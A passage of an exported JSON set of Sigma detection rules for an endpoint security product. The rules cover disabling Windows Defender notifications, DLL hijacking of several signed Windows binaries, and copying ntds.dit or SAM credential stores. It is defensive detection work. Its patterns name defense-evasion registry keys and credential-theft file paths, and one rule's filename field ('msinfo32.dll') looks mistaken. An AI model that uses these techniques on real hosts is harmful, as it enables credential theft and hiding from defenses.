"id": "cdc610fd-f43b-4587-a27f-cd30832c205d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621322Z",
"creation_date": "2026-03-23T11:45:34.621324Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621329Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_windows_defender_notifications.yml",
"content": "title: Windows Defender Notifications Disabled\nid: cdc610fd-f43b-4587-a27f-cd30832c205d\ndescription: |\n Detects the disabling of Windows Defender notifications.\n Attackers can use this technique to prevent users from being alerted by a Windows Defender detection notification and thus to hide their malicious activity.\n It is recommended to analyze the process repsonsible for this registry modification and to look for other malicious actions on the host.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ProcessParentImage|contains: '\\'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup 
-s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_kiosk_mode:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k AssignedAccessManagerSvc -s AssignedAccessManagerSvc'\n - '?:\\WINDOWS\\system32\\svchost.exe -k AssignedAccessManagerSvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_userprofile_config:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdc610fd-f43b-4587-a27f-cd30832c205d",
"rule_name": "Windows Defender Notifications Disabled",
"rule_description": "Detects the disabling of Windows Defender notifications.\nAttackers can use this technique to prevent users from being alerted by a Windows Defender detection notification and thus to hide their malicious activity.\nThe monitored value lives under the Windows Defender policy key, so writes made as SYSTEM by Group Policy processing (gpsvc), Configuration Manager (CcmExec), the assigned access (kiosk) service and the user profile service are excluded, as is resetting the value to zero.\nIt is recommended to analyze the process responsible for this registry modification and to look for other malicious actions on the host.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdc72cb2-30ce-46b8-9611-ad997390c08c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081820Z",
"creation_date": "2026-03-23T11:45:34.081823Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081827Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/ShadowChasing1/status/1557287930267578368",
"https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html",
"https://twitter.com/h2jazi/status/1379816750120861697",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winword.yml",
"content": "title: DLL Hijacking via WinWord.exe\nid: cdc72cb2-30ce-46b8-9611-ad997390c08c\ndescription: |\n Detects potential Windows DLL Hijacking via WinWord.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by putting a legitimate WinWord executable from Office 2013 alongside a malicious msvcr100.dll.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/ShadowChasing1/status/1557287930267578368\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://twitter.com/h2jazi/status/1379816750120861697\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/24\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WinWord.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\MSVCR100.dll'\n - '\\explorerframe.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\wwlib.dll'\n - '\\AppvIsvSubsystems32.dll'\n - '\\AppvIsvSubsystems64.dll'\n - '\\fastprox.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Microsoft Office\\root\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\'\n - '?:\\Program Files\\Microsoft Office\\Office??\\'\n - '?:\\Program Files 
(x86)\\Microsoft Office\\Office??\\'\n - '?:\\Microsoft Office\\Office??\\'\n - '?:\\Program Files\\Microsoft Office ??\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_naturally_speaking:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Nuance\\NaturallySpeaking*\\Program\\'\n - '?:\\Program Files (x86)\\Nuance\\NaturallySpeaking*\\Program\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdc72cb2-30ce-46b8-9611-ad997390c08c",
"rule_name": "DLL Hijacking via WinWord.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WinWord.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by putting a legitimate WinWord executable from Office 2013 alongside a malicious msvcr100.dll.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-24",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cdd4fb16-9b72-475e-9f75-5992667cdf32",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074843Z",
"creation_date": "2026-03-23T11:45:34.074845Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074849Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfscmd.yml",
"content": "title: DLL Hijacking via dfscmd.exe\nid: cdd4fb16-9b72-475e-9f75-5992667cdf32\ndescription: |\n Detects potential Windows DLL Hijacking via dfscmd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dfscmd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\netapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cdd4fb16-9b72-475e-9f75-5992667cdf32",
"rule_name": "DLL Hijacking via dfscmd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dfscmd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ce21d80b-abf4-48da-b3e7-8e01176c8667",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591235Z",
"creation_date": "2026-03-23T11:45:34.591239Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591246Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tsdiscon.yml",
"content": "title: DLL Hijacking via tsdiscon.exe\nid: ce21d80b-abf4-48da-b3e7-8e01176c8667\ndescription: |\n Detects potential Windows DLL Hijacking via tsdiscon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tsdiscon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ce21d80b-abf4-48da-b3e7-8e01176c8667",
"rule_name": "DLL Hijacking via tsdiscon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tsdiscon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ce47ead7-672e-49a7-994a-a3b33cdff7db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080122Z",
"creation_date": "2026-03-23T11:45:34.080124Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080128Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/",
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/",
"https://attack.mitre.org/techniques/T1003/003/"
],
"name": "t1003_003_copying_sensitive_files_with_commandline_tools.yml",
"content": "title: Sensitive Files Copied via Command-line Tools\nid: ce47ead7-672e-49a7-994a-a3b33cdff7db\ndescription: |\n Detects the execution of command-line tools to copy or move sensitive files like the Active Directory Domain Database (ntds.dit) or the Security Account Manager (SAM).\n Such files contain sensitive information including hashed domain, information about domain members such as devices, users, and access rights.\n Attackers can use these copied files for credential access.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\nreferences:\n - https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n - https://attack.mitre.org/techniques/T1003/003/\ndate: 2022/11/17\nmodified: 2025/09/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.003\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\xcopy.exe'\n - OriginalFileName:\n - 'cmd.exe'\n - 'powershell.exe'\n - 'xcopy.exe'\n\n selection_action:\n CommandLine|contains:\n - 'copy '\n - 'Copy-Item'\n - 'move'\n - 'cp'\n - 'mv'\n\n selection_target:\n CommandLine|contains:\n - '\\ntds.dit'\n - '/ntds.dit'\n - '\\config?SAM'\n - '/config?SAM'\n - '\\GLOBALROOT?Device?HarddiskVolumeShadowCopy'\n - '/GLOBALROOT?Device?HarddiskVolumeShadowCopy'\n\n # C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe # Check if sam database has bad permissions\n # This is also used to check hardening against HiveNightmare SeriousSam CVE-2021-36934 $checkSpoolerStatus = $(Get-Service -Name Spooler | Select -Property 
Status).Status $checkSpoolerStartType = $(Get-Service -Name Spooler | Select -Property StartType).StartType $result=\"OK\" # Check for build $build_number = $((Get-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\").CurrentBuild) if ($build_number -gt 17763) { Write-Output \"DEBUG:Build number requires additional checks on the sam database permissions...\" # Check for sam permissions $sam_permissions = (get-acl $env:windir\\system32\\config\\sam).Access if (($sam_permissions | where-object { $_.filesystemrights -like \"*read*\" -and $_.identityreference -like \"*BUILTIN\\Users*\" -and $_.acce\n exclusion_cyberwatch:\n - GrandparentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n # if cyberwatch agent is not installed on endpoint, it's checked \"remotely\" using PowerShell and we see only this...\n - ProcessCommandLine: '*System32\\WindowsPowerShell\\v1.0\\powershell.exe*This is also used to check hardening against HiveNightmare SeriousSam*'\n\n exclusion_autobackup7pro:\n - ProcessGrandparentOriginalFileName: 'AutoBackup7Pro.exe'\n - ProcessAncestors|contains: '\\AutoBackup7Pro.exe|'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ce47ead7-672e-49a7-994a-a3b33cdff7db",
"rule_name": "Sensitive Files Copied via Command-line Tools",
"rule_description": "Detects the execution of command-line tools to copy or move sensitive files like the Active Directory Domain Database (ntds.dit) or the Security Account Manager (SAM).\nSuch files contain sensitive information including hashed domain, information about domain members such as devices, users, and access rights.\nAttackers can use these copied files for credential access.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-09-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ce8afb89-a2cc-4070-a2ea-7ab67781ccac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093049Z",
"creation_date": "2026-03-23T11:45:34.093051Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093056Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_msinfo32.yml",
"content": "title: Phantom DLL Hijacking via msinfo32.exe\nid: ce8afb89-a2cc-4070-a2ea-7ab67781ccac\ndescription: |\n Detects a potential Windows DLL search order hijacking via msinfo32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msinfo32.dll'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\fveapi.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ce8afb89-a2cc-4070-a2ea-7ab67781ccac",
"rule_name": "Phantom DLL Hijacking via msinfo32.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via msinfo32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cee5198e-a01f-4f6e-9fe8-39acefc9b3c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097320Z",
"creation_date": "2026-03-23T11:45:34.097321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097326Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lockapphost.yml",
"content": "title: DLL Hijacking via LockAppHost.exe\nid: cee5198e-a01f-4f6e-9fe8-39acefc9b3c1\ndescription: |\n Detects potential Windows DLL Hijacking via LockAppHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LockAppHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\lockhostingframework.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cee5198e-a01f-4f6e-9fe8-39acefc9b3c1",
"rule_name": "DLL Hijacking via LockAppHost.exe",
